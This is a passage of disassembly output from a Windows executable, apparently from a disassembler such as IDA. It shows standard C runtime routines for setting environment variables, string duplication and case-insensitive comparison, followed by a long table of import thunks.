var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push esi
cmp [ebp+arg_0], 0
jz short loc_43076C
push 3Dh
mov eax, [ebp+arg_0]
push eax
call sub_430B90
add esp, 8
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_43076C
mov ecx, [ebp+arg_0]
cmp ecx, [ebp+var_18]
jnz short loc_430774
loc_43076C: ; CODE XREF: sub_430740+B�j
; sub_430740+22�j
or eax, 0FFFFFFFFh
jmp loc_430A1B
; ---------------------------------------------------------------------------
loc_430774: ; CODE XREF: sub_430740+2A�j
mov edx, [ebp+var_18]
movsx eax, byte ptr [edx+1]
neg eax
sbb eax, eax
inc eax
mov [ebp+var_14], eax
mov ecx, dword_4920B0
cmp ecx, dword_4920B4
jnz short loc_4307A5
mov edx, dword_4920B0
push edx
call sub_430AA0
add esp, 4
mov dword_4920B0, eax
loc_4307A5: ; CODE XREF: sub_430740+4F�j
cmp dword_4920B0, 0
jnz loc_430865
cmp [ebp+arg_4], 0
jz short loc_4307D7
cmp dword_4920B8, 0
jz short loc_4307D7
call sub_430240
test eax, eax
jz short loc_4307D2
or eax, 0FFFFFFFFh
jmp loc_430A1B
; ---------------------------------------------------------------------------
loc_4307D2: ; CODE XREF: sub_430740+88�j
jmp loc_430865
; ---------------------------------------------------------------------------
loc_4307D7: ; CODE XREF: sub_430740+76�j
; sub_430740+7F�j
cmp [ebp+var_14], 0
jz short loc_4307E4
xor eax, eax
jmp loc_430A1B
; ---------------------------------------------------------------------------
loc_4307E4: ; CODE XREF: sub_430740+9B�j
cmp dword_4920B0, 0
jnz short loc_430824
push 87h
push offset aSetenv_c ; "setenv.c"
push 2
push 4
call sub_416A30
add esp, 10h
mov dword_4920B0, eax
cmp dword_4920B0, 0
jnz short loc_430819
or eax, 0FFFFFFFFh
jmp loc_430A1B
; ---------------------------------------------------------------------------
loc_430819: ; CODE XREF: sub_430740+CF�j
mov eax, dword_4920B0
mov dword ptr [eax], 0
loc_430824: ; CODE XREF: sub_430740+AB�j
cmp dword_4920B8, 0
jnz short loc_430865
push 8Eh
push offset aSetenv_c ; "setenv.c"
push 2
push 4
call sub_416A30
add esp, 10h
mov dword_4920B8, eax
cmp dword_4920B8, 0
jnz short loc_430859
or eax, 0FFFFFFFFh
jmp loc_430A1B
; ---------------------------------------------------------------------------
loc_430859: ; CODE XREF: sub_430740+10F�j
mov ecx, dword_4920B8
mov dword ptr [ecx], 0
loc_430865: ; CODE XREF: sub_430740+6C�j
; sub_430740:loc_4307D2�j ...
mov edx, dword_4920B0
mov [ebp+var_C], edx
mov eax, [ebp+var_18]
sub eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_430A20
add esp, 8
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jl loc_430921
mov edx, [ebp+var_C]
cmp dword ptr [edx], 0
jz loc_430921
cmp [ebp+var_14], 0
jz short loc_430913
push 2
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov edx, [ecx+eax*4]
push edx
call sub_4174C0
add esp, 8
jmp short loc_4308BF
; ---------------------------------------------------------------------------
loc_4308B6: ; CODE XREF: sub_430740+19E�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_4308BF: ; CODE XREF: sub_430740+174�j
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
cmp dword ptr [edx+ecx*4], 0
jz short loc_4308E0
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov esi, [ebp+var_C]
mov edx, [esi+edx*4+4]
mov [ecx+eax*4], edx
jmp short loc_4308B6
; ---------------------------------------------------------------------------
loc_4308E0: ; CODE XREF: sub_430740+189�j
push 0B9h
push offset aSetenv_c ; "setenv.c"
push 2
mov eax, [ebp+var_8]
shl eax, 2
push eax
mov ecx, [ebp+var_C]
push ecx
call sub_416EC0
add esp, 14h
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_430911
mov edx, [ebp+var_C]
mov dword_4920B0, edx
loc_430911: ; CODE XREF: sub_430740+1C6�j
jmp short loc_43091F
; ---------------------------------------------------------------------------
loc_430913: ; CODE XREF: sub_430740+15E�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_0]
mov [ecx+eax*4], edx
loc_43091F: ; CODE XREF: sub_430740:loc_430911�j
jmp short loc_430994
; ---------------------------------------------------------------------------
loc_430921: ; CODE XREF: sub_430740+148�j
; sub_430740+154�j
cmp [ebp+var_14], 0
jnz short loc_43098D
cmp [ebp+var_8], 0
jge short loc_430935
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_430935: ; CODE XREF: sub_430740+1EB�j
push 0CEh
push offset aSetenv_c ; "setenv.c"
push 2
mov ecx, [ebp+var_8]
lea edx, ds:8[ecx*4]
push edx
mov eax, [ebp+var_C]
push eax
call sub_416EC0
add esp, 14h
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_430969
or eax, 0FFFFFFFFh
jmp loc_430A1B
; ---------------------------------------------------------------------------
loc_430969: ; CODE XREF: sub_430740+21F�j
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [ebp+arg_0]
mov [edx+ecx*4], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov dword ptr [edx+ecx*4+4], 0
mov eax, [ebp+var_C]
mov dword_4920B0, eax
jmp short loc_430994
; ---------------------------------------------------------------------------
loc_43098D: ; CODE XREF: sub_430740+1E5�j
xor eax, eax
jmp loc_430A1B
; ---------------------------------------------------------------------------
loc_430994: ; CODE XREF: sub_430740:loc_43091F�j
; sub_430740+24B�j
cmp [ebp+arg_4], 0
jz short loc_430A19
push 0E5h
push offset aSetenv_c ; "setenv.c"
push 2
mov ecx, [ebp+arg_0]
push ecx
call sub_418E70
add esp, 4
add eax, 2
push eax
call sub_416A30
add esp, 10h
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_430A19
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_10]
push eax
call sub_419FA0
add esp, 8
mov ecx, [ebp+var_18]
sub ecx, [ebp+arg_0]
mov edx, [ebp+var_10]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
neg edx
sbb edx, edx
not edx
and edx, [ebp+var_4]
push edx
mov eax, [ebp+var_10]
push eax
call ds:dword_494294
push 2
mov ecx, [ebp+var_10]
push ecx
call sub_4174C0
add esp, 8
loc_430A19: ; CODE XREF: sub_430740+258�j
; sub_430740+285�j
xor eax, eax
loc_430A1B: ; CODE XREF: sub_430740+2F�j
; sub_430740+8D�j ...
pop esi
mov esp, ebp
pop ebp
retn
sub_430740 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430A20 proc near ; CODE XREF: sub_430740+139�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, dword_4920B0
mov [ebp+var_4], eax
jmp short loc_430A37
; ---------------------------------------------------------------------------
loc_430A2E: ; CODE XREF: sub_430A20:loc_430A88�j
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
loc_430A37: ; CODE XREF: sub_430A20+C�j
mov edx, [ebp+var_4]
cmp dword ptr [edx], 0
jz short loc_430A8A
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_4301F0
add esp, 0Ch
test eax, eax
jnz short loc_430A88
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [edx+eax]
cmp ecx, 3Dh
jz short loc_430A7A
mov edx, [ebp+var_4]
mov eax, [edx]
mov ecx, [ebp+arg_4]
movsx edx, byte ptr [eax+ecx]
test edx, edx
jnz short loc_430A88
loc_430A7A: ; CODE XREF: sub_430A20+48�j
mov eax, [ebp+var_4]
sub eax, dword_4920B0
sar eax, 2
jmp short loc_430A98
; ---------------------------------------------------------------------------
loc_430A88: ; CODE XREF: sub_430A20+37�j
; sub_430A20+58�j
jmp short loc_430A2E
; ---------------------------------------------------------------------------
loc_430A8A: ; CODE XREF: sub_430A20+1D�j
mov eax, [ebp+var_4]
sub eax, dword_4920B0
sar eax, 2
neg eax
loc_430A98: ; CODE XREF: sub_430A20+66�j
mov esp, ebp
pop ebp
retn
sub_430A20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430AA0 proc near ; CODE XREF: sub_430740+58�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], 0
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
cmp [ebp+arg_0], 0
jnz short loc_430AC0
xor eax, eax
jmp loc_430B8A
; ---------------------------------------------------------------------------
loc_430AC0: ; CODE XREF: sub_430AA0+17�j
; sub_430AA0+3B�j
mov ecx, [ebp+var_C]
mov edx, [ecx]
mov eax, [ebp+var_C]
add eax, 4
mov [ebp+var_C], eax
test edx, edx
jz short loc_430ADD
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
jmp short loc_430AC0
; ---------------------------------------------------------------------------
loc_430ADD: ; CODE XREF: sub_430AA0+30�j
push 146h
push offset aSetenv_c ; "setenv.c"
push 2
mov edx, [ebp+var_10]
lea eax, ds:4[edx*4]
push eax
call sub_416A30
add esp, 10h
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0
jnz short loc_430B15
push 9
call sub_41BAE0
add esp, 4
loc_430B15: ; CODE XREF: sub_430AA0+69�j
mov edx, [ebp+arg_0]
mov [ebp+var_C], edx
loc_430B1B: ; CODE XREF: sub_430AA0+DC�j
mov eax, [ebp+var_C]
cmp dword ptr [eax], 0
jz short loc_430B7E
push 14Fh
push offset aSetenv_c ; "setenv.c"
push 2
mov ecx, [ebp+var_C]
mov edx, [ecx]
push edx
call sub_418E70
add esp, 4
add eax, 1
push eax
call sub_416A30
add esp, 10h
mov ecx, [ebp+var_8]
mov [ecx], eax
mov edx, [ebp+var_8]
cmp dword ptr [edx], 0
jz short loc_430B6A
mov eax, [ebp+var_C]
mov ecx, [eax]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call sub_419FA0
add esp, 8
loc_430B6A: ; CODE XREF: sub_430AA0+B4�j
mov ecx, [ebp+var_C]
add ecx, 4
mov [ebp+var_C], ecx
mov edx, [ebp+var_8]
add edx, 4
mov [ebp+var_8], edx
jmp short loc_430B1B
; ---------------------------------------------------------------------------
loc_430B7E: ; CODE XREF: sub_430AA0+81�j
mov eax, [ebp+var_8]
mov dword ptr [eax], 0
mov eax, [ebp+var_4]
loc_430B8A: ; CODE XREF: sub_430AA0+1B�j
mov esp, ebp
pop ebp
retn
sub_430AA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430B90 proc near ; CODE XREF: sub_430740+13�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp dword_49253C, 0
jnz short loc_430BB2
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_4199F0
add esp, 8
jmp loc_430C79
; ---------------------------------------------------------------------------
loc_430BB2: ; CODE XREF: sub_430B90+B�j
push 19h
call sub_41BC90
add esp, 4
jmp short loc_430BC7
; ---------------------------------------------------------------------------
loc_430BBE: ; CODE XREF: sub_430B90:loc_430C56�j
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
loc_430BC7: ; CODE XREF: sub_430B90+2C�j
mov eax, [ebp+arg_0]
movzx cx, byte ptr [eax]
mov word ptr [ebp+var_4], cx
mov edx, [ebp+var_4]
and edx, 0FFFFh
test edx, edx
jz short loc_430C5B
mov eax, [ebp+var_4]
and eax, 0FFh
xor ecx, ecx
mov cl, byte_492641[eax]
and ecx, 4
test ecx, ecx
jz short loc_430C46
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jnz short loc_430C18
push 19h
call sub_41BD30
add esp, 4
xor eax, eax
jmp short loc_430C79
; ---------------------------------------------------------------------------
loc_430C18: ; CODE XREF: sub_430B90+78�j
mov edx, [ebp+var_4]
and edx, 0FFFFh
shl edx, 8
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
or edx, ecx
cmp [ebp+arg_4], edx
jnz short loc_430C44
push 19h
call sub_41BD30
add esp, 4
mov eax, [ebp+arg_0]
sub eax, 1
jmp short loc_430C79
; ---------------------------------------------------------------------------
loc_430C44: ; CODE XREF: sub_430B90+A0�j
jmp short loc_430C56
; ---------------------------------------------------------------------------
loc_430C46: ; CODE XREF: sub_430B90+64�j
mov edx, [ebp+var_4]
and edx, 0FFFFh
cmp [ebp+arg_4], edx
jnz short loc_430C56
jmp short loc_430C5B
; ---------------------------------------------------------------------------
loc_430C56: ; CODE XREF: sub_430B90:loc_430C44�j
; sub_430B90+C2�j
jmp loc_430BBE
; ---------------------------------------------------------------------------
loc_430C5B: ; CODE XREF: sub_430B90+4D�j
; sub_430B90+C4�j
push 19h
call sub_41BD30
add esp, 4
mov eax, [ebp+var_4]
and eax, 0FFFFh
cmp [ebp+arg_4], eax
jnz short loc_430C77
mov eax, [ebp+arg_0]
jmp short loc_430C79
; ---------------------------------------------------------------------------
loc_430C77: ; CODE XREF: sub_430B90+E0�j
xor eax, eax
loc_430C79: ; CODE XREF: sub_430B90+1D�j
; sub_430B90+86�j ...
mov esp, ebp
pop ebp
retn
sub_430B90 endp
; ---------------------------------------------------------------------------
align 10h
jmp ds:dword_4944DC
; ---------------------------------------------------------------------------
jmp ds:dword_4944D8
; ---------------------------------------------------------------------------
jmp ds:dword_4944D4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_430C92 proc near ; CODE XREF: sub_406614+15B�p
jmp ds:dword_4944D0
sub_430C92 endp
; ---------------------------------------------------------------------------
jmp ds:dword_4944CC
; ---------------------------------------------------------------------------
jmp ds:dword_4944C8
; ---------------------------------------------------------------------------
jmp ds:dword_4944C4
; ---------------------------------------------------------------------------
jmp ds:dword_4944C0
; ---------------------------------------------------------------------------
jmp ds:dword_4944BC
; ---------------------------------------------------------------------------
jmp ds:dword_4944B8
; ---------------------------------------------------------------------------
jmp ds:dword_4944B4
; ---------------------------------------------------------------------------
jmp ds:dword_4944B0
; ---------------------------------------------------------------------------
jmp ds:dword_4944AC
; ---------------------------------------------------------------------------
jmp ds:dword_4944A8
; ---------------------------------------------------------------------------
jmp ds:dword_4944A4
; ---------------------------------------------------------------------------
jmp ds:dword_4944A0
; ---------------------------------------------------------------------------
jmp ds:dword_4942D4
; ---------------------------------------------------------------------------
jmp ds:dword_4942D8
; ---------------------------------------------------------------------------
jmp ds:dword_4942DC
; ---------------------------------------------------------------------------
jmp ds:dword_4942E0
; ---------------------------------------------------------------------------
jmp ds:dword_4942E4
; ---------------------------------------------------------------------------
jmp ds:dword_4942E8
; ---------------------------------------------------------------------------
jmp ds:dword_4942EC
; ---------------------------------------------------------------------------
jmp ds:dword_4942F0
; ---------------------------------------------------------------------------
jmp ds:dword_4942F4
; ---------------------------------------------------------------------------
jmp ds:dword_4942F8
; ---------------------------------------------------------------------------
jmp ds:dword_4942FC
; ---------------------------------------------------------------------------
jmp ds:dword_494300
; ---------------------------------------------------------------------------
jmp ds:dword_494304
; ---------------------------------------------------------------------------
jmp ds:dword_494308
; ---------------------------------------------------------------------------
jmp ds:dword_49430C
; ---------------------------------------------------------------------------
jmp ds:dword_494310
; ---------------------------------------------------------------------------
jmp ds:dword_494314
; ---------------------------------------------------------------------------
jmp ds:dword_494318
; ---------------------------------------------------------------------------
jmp ds:dword_49431C
; ---------------------------------------------------------------------------
jmp ds:dword_494320
; ---------------------------------------------------------------------------
jmp ds:dword_494324
; ---------------------------------------------------------------------------
jmp ds:dword_494328
; ---------------------------------------------------------------------------
jmp ds:dword_49432C
; ---------------------------------------------------------------------------
jmp ds:dword_494330
; ---------------------------------------------------------------------------
jmp ds:dword_494334
; ---------------------------------------------------------------------------
jmp ds:dword_494338
; ---------------------------------------------------------------------------
jmp ds:dword_49433C
; ---------------------------------------------------------------------------
jmp ds:dword_494340
; ---------------------------------------------------------------------------
jmp ds:dword_494344
; ---------------------------------------------------------------------------
jmp ds:dword_494348
; ---------------------------------------------------------------------------
jmp ds:dword_49434C
; ---------------------------------------------------------------------------
jmp ds:dword_494350
; ---------------------------------------------------------------------------
jmp ds:dword_494354
; ---------------------------------------------------------------------------
jmp ds:dword_494358
; ---------------------------------------------------------------------------
jmp ds:dword_49435C
; ---------------------------------------------------------------------------
jmp ds:dword_494360
; ---------------------------------------------------------------------------
jmp ds:dword_494364
; ---------------------------------------------------------------------------
jmp ds:dword_494368
; ---------------------------------------------------------------------------
jmp ds:dword_49436C
; ---------------------------------------------------------------------------
jmp ds:dword_494370
; ---------------------------------------------------------------------------
jmp ds:dword_494374
; ---------------------------------------------------------------------------
jmp ds:dword_494378
; ---------------------------------------------------------------------------
jmp ds:dword_49437C
; ---------------------------------------------------------------------------
jmp ds:dword_494380
; ---------------------------------------------------------------------------
jmp ds:dword_494384
; ---------------------------------------------------------------------------
jmp ds:dword_494388
; ---------------------------------------------------------------------------
jmp ds:dword_49438C
; ---------------------------------------------------------------------------
jmp ds:dword_494390
; ---------------------------------------------------------------------------
jmp ds:dword_494394
; ---------------------------------------------------------------------------
jmp ds:dword_494398
; ---------------------------------------------------------------------------
jmp ds:dword_49439C
; ---------------------------------------------------------------------------
jmp ds:dword_4943A0
; ---------------------------------------------------------------------------
jmp ds:dword_4943A4
; ---------------------------------------------------------------------------
jmp ds:dword_4943A8
; ---------------------------------------------------------------------------
jmp ds:dword_4943AC
; ---------------------------------------------------------------------------
jmp ds:dword_4943B0
; ---------------------------------------------------------------------------
jmp ds:dword_4943B4
; ---------------------------------------------------------------------------
jmp ds:dword_494290
; ---------------------------------------------------------------------------
jmp ds:dword_4943B8
; ---------------------------------------------------------------------------
jmp ds:dword_4943BC
; ---------------------------------------------------------------------------
jmp ds:dword_4943C0
; ---------------------------------------------------------------------------
jmp ds:dword_4943C4
; ---------------------------------------------------------------------------
jmp ds:dword_4943C8
; ---------------------------------------------------------------------------
jmp ds:dword_4943CC
; ---------------------------------------------------------------------------
jmp ds:dword_4943D0
; ---------------------------------------------------------------------------
jmp ds:dword_4943D4
; ---------------------------------------------------------------------------
jmp ds:dword_4943D8
; ---------------------------------------------------------------------------
jmp ds:dword_4943DC
; ---------------------------------------------------------------------------
jmp ds:dword_4943E0
; ---------------------------------------------------------------------------
jmp ds:dword_4943E4
; ---------------------------------------------------------------------------
jmp ds:dword_4943E8
; ---------------------------------------------------------------------------
jmp ds:dword_4943EC
; ---------------------------------------------------------------------------
jmp ds:dword_4943F0
; ---------------------------------------------------------------------------
jmp ds:dword_4943F4
; ---------------------------------------------------------------------------
jmp ds:dword_4943F8
; ---------------------------------------------------------------------------
jmp ds:dword_4943FC
; ---------------------------------------------------------------------------
jmp ds:dword_494400
; ---------------------------------------------------------------------------
jmp ds:dword_494404
; ---------------------------------------------------------------------------
jmp ds:dword_494408
; ---------------------------------------------------------------------------
jmp ds:dword_49440C
; ---------------------------------------------------------------------------
jmp ds:dword_494410
; ---------------------------------------------------------------------------
jmp ds:dword_494414
; ---------------------------------------------------------------------------
jmp ds:dword_494418
; ---------------------------------------------------------------------------
jmp ds:dword_49441C
; ---------------------------------------------------------------------------
jmp ds:dword_494420
; ---------------------------------------------------------------------------
jmp ds:dword_494424
; ---------------------------------------------------------------------------
jmp ds:dword_494428
; ---------------------------------------------------------------------------
jmp ds:dword_49442C
; ---------------------------------------------------------------------------
jmp ds:dword_494430
; ---------------------------------------------------------------------------
jmp ds:dword_494434
; ---------------------------------------------------------------------------
jmp ds:dword_494438
; ---------------------------------------------------------------------------
jmp ds:dword_49443C
; ---------------------------------------------------------------------------
jmp ds:dword_494440
; ---------------------------------------------------------------------------
jmp ds:dword_494444
; ---------------------------------------------------------------------------
jmp ds:dword_494448
; ---------------------------------------------------------------------------
jmp ds:dword_49444C
; ---------------------------------------------------------------------------
jmp ds:dword_494450
; ---------------------------------------------------------------------------
jmp ds:dword_494454
; ---------------------------------------------------------------------------
jmp ds:dword_494458
; ---------------------------------------------------------------------------
jmp ds:dword_49445C
; ---------------------------------------------------------------------------
jmp ds:dword_494460
; ---------------------------------------------------------------------------
jmp ds:dword_494464
; ---------------------------------------------------------------------------
jmp ds:dword_494468
; ---------------------------------------------------------------------------
jmp ds:dword_49446C
; ---------------------------------------------------------------------------
jmp ds:dword_494470
; ---------------------------------------------------------------------------
jmp ds:dword_494474
; ---------------------------------------------------------------------------
jmp ds:dword_494478
; ---------------------------------------------------------------------------
jmp ds:dword_49447C
; ---------------------------------------------------------------------------
jmp ds:dword_494480
; ---------------------------------------------------------------------------
jmp ds:dword_494484
; ---------------------------------------------------------------------------
jmp ds:dword_494488
; ---------------------------------------------------------------------------
jmp ds:dword_49448C
; ---------------------------------------------------------------------------
jmp ds:dword_494490
; ---------------------------------------------------------------------------
jmp ds:dword_494494
; ---------------------------------------------------------------------------
jmp ds:dword_494498
; ---------------------------------------------------------------------------
jmp ds:dword_4942D0
; ---------------------------------------------------------------------------
jmp ds:dword_4942CC
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_430F9E proc near ; CODE XREF: sub_425E8C+13�p
jmp ds:dword_4942C8
sub_430F9E endp
; ---------------------------------------------------------------------------
jmp ds:dword_4942C4
; ---------------------------------------------------------------------------
jmp ds:dword_4942C0
; ---------------------------------------------------------------------------
jmp ds:dword_4942BC
; ---------------------------------------------------------------------------
jmp ds:dword_4942B8
; ---------------------------------------------------------------------------
jmp ds:dword_4942B4
; ---------------------------------------------------------------------------
jmp ds:dword_4942B0
; ---------------------------------------------------------------------------
jmp ds:dword_4942AC
; ---------------------------------------------------------------------------
jmp ds:dword_4942A8
; ---------------------------------------------------------------------------
jmp ds:dword_4942A4
; ---------------------------------------------------------------------------
jmp ds:dword_4942A0
; ---------------------------------------------------------------------------
jmp ds:dword_49429C
; ---------------------------------------------------------------------------
jmp ds:dword_494298
; ---------------------------------------------------------------------------
jmp ds:dword_494294
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431000 proc near ; CODE XREF: sub_405FE1+E2�p
; sub_405FE1+F9�p ...
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
cmp dword_492170, 0
jnz loc_4310CA
loc_431013: ; CODE XREF: sub_431000+BF�j
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, [eax]
cmp ecx, 5Ah
jg short loc_43103D
mov edx, [ebp+arg_0]
xor eax, eax
mov ax, [edx]
cmp eax, 41h
jl short loc_43103D
mov ecx, [ebp+arg_0]
xor edx, edx
mov dx, [ecx]
add edx, 20h
mov [ebp+var_10], edx
jmp short loc_431048
; ---------------------------------------------------------------------------
loc_43103D: ; CODE XREF: sub_431000+1E�j
; sub_431000+2B�j
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, [eax]
mov [ebp+var_10], ecx
loc_431048: ; CODE XREF: sub_431000+3B�j
mov dx, word ptr [ebp+var_10]
mov word ptr [ebp+var_4], dx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cx, [eax]
cmp ecx, 5Ah
jg short loc_43107A
mov edx, [ebp+arg_4]
xor eax, eax
mov ax, [edx]
cmp eax, 41h
jl short loc_43107A
mov ecx, [ebp+arg_4]
xor edx, edx
mov dx, [ecx]
add edx, 20h
mov [ebp+var_14], edx
jmp short loc_431085
; ---------------------------------------------------------------------------
loc_43107A: ; CODE XREF: sub_431000+5B�j
; sub_431000+68�j
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cx, [eax]
mov [ebp+var_14], ecx
loc_431085: ; CODE XREF: sub_431000+78�j
mov dx, word ptr [ebp+var_14]
mov word ptr [ebp+var_C], dx
mov eax, [ebp+arg_0]
add eax, 2
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_4]
add ecx, 2
mov [ebp+arg_4], ecx
mov edx, [ebp+var_4]
and edx, 0FFFFh
test edx, edx
jz short loc_4310C5
mov eax, [ebp+var_4]
and eax, 0FFFFh
mov ecx, [ebp+var_C]
and ecx, 0FFFFh
cmp eax, ecx
jz loc_431013
loc_4310C5: ; CODE XREF: sub_431000+AA�j
jmp loc_43118A
; ---------------------------------------------------------------------------
loc_4310CA: ; CODE XREF: sub_431000+D�j
push offset dword_49274C
call ds:dword_494418
cmp dword_492748, 0
jz short loc_4310FC
push offset dword_49274C
call ds:dword_494414
push 13h
call sub_41BC90
add esp, 4
mov [ebp+var_8], 1
jmp short loc_431103
; ---------------------------------------------------------------------------
loc_4310FC: ; CODE XREF: sub_431000+DC�j
mov [ebp+var_8], 0
loc_431103: ; CODE XREF: sub_431000+FA�j
; sub_431000+16B�j
mov edx, [ebp+arg_0]
mov ax, [edx]
mov [ebp+var_16], ax
mov cx, [ebp+var_16]
push ecx
mov edx, [ebp+arg_0]
add edx, 2
mov [ebp+arg_0], edx
call sub_4312D0
add esp, 4
mov word ptr [ebp+var_4], ax
mov eax, [ebp+arg_4]
mov cx, [eax]
mov [ebp+var_18], cx
mov dx, [ebp+var_18]
push edx
mov eax, [ebp+arg_4]
add eax, 2
mov [ebp+arg_4], eax
call sub_4312D0
add esp, 4
mov word ptr [ebp+var_C], ax
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
test ecx, ecx
jz short loc_43116D
mov edx, [ebp+var_4]
and edx, 0FFFFh
mov eax, [ebp+var_C]
and eax, 0FFFFh
cmp edx, eax
jz short loc_431103
loc_43116D: ; CODE XREF: sub_431000+156�j
cmp [ebp+var_8], 0
jz short loc_43117F
push 13h
call sub_41BD30
add esp, 4
jmp short loc_43118A
; ---------------------------------------------------------------------------
loc_43117F: ; CODE XREF: sub_431000+171�j
push offset dword_49274C
call ds:dword_494414
loc_43118A: ; CODE XREF: sub_431000:loc_4310C5�j
; sub_431000+17D�j
mov eax, [ebp+var_4]
and eax, 0FFFFh
mov ecx, [ebp+var_C]
and ecx, 0FFFFh
sub eax, ecx
mov esp, ebp
pop ebp
retn
sub_431000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4311B0 proc near ; CODE XREF: sub_409842+21�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_4311BE
xor eax, eax
jmp short loc_4311F3
; ---------------------------------------------------------------------------
loc_4311BE: ; CODE XREF: sub_4311B0+8�j
mov eax, [ebp+arg_0]
push eax
call sub_418E70
add esp, 4
add eax, 1
push eax
call sub_416A10
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4311F1
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_419FA0
add esp, 8
jmp short loc_4311F3
; ---------------------------------------------------------------------------
loc_4311F1: ; CODE XREF: sub_4311B0+2D�j
xor eax, eax
loc_4311F3: ; CODE XREF: sub_4311B0+C�j
; sub_4311B0+3F�j
mov esp, ebp
pop ebp
retn
sub_4311B0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+8]
and eax, 0FFFFh
cmp eax, 0FFFFh
jnz short loc_43121C
mov ax, [ebp+8]
jmp loc_4312C1
; ---------------------------------------------------------------------------
loc_43121C: ; CODE XREF: .text:00431211�j
cmp dword_492170, 0
jnz short loc_431256
mov ecx, [ebp+8]
and ecx, 0FFFFh
cmp ecx, 41h
jl short loc_431250
mov edx, [ebp+8]
and edx, 0FFFFh
cmp edx, 5Ah
jg short loc_431250
mov eax, [ebp+8]
and eax, 0FFFFh
add eax, 20h
mov [ebp+8], ax
loc_431250: ; CODE XREF: .text:00431231�j
; .text:0043123F�j
mov ax, [ebp+8]
jmp short loc_4312C1
; ---------------------------------------------------------------------------
loc_431256: ; CODE XREF: .text:00431223�j
push offset dword_49274C
call ds:dword_494418
cmp dword_492748, 0
jz short loc_431288
push offset dword_49274C
call ds:dword_494414
push 13h
call sub_41BC90
add esp, 4
mov dword ptr [ebp-4], 1
jmp short loc_43128F
; ---------------------------------------------------------------------------
loc_431288: ; CODE XREF: .text:00431268�j
mov dword ptr [ebp-4], 0
loc_43128F: ; CODE XREF: .text:00431286�j
mov cx, [ebp+8]
push ecx
call sub_4312D0
add esp, 4
mov [ebp+8], ax
cmp dword ptr [ebp-4], 0
jz short loc_4312B2
push 13h
call sub_41BD30
add esp, 4
jmp short loc_4312BD
; ---------------------------------------------------------------------------
loc_4312B2: ; CODE XREF: .text:004312A4�j
push offset dword_49274C
call ds:dword_494414
loc_4312BD: ; CODE XREF: .text:004312B0�j
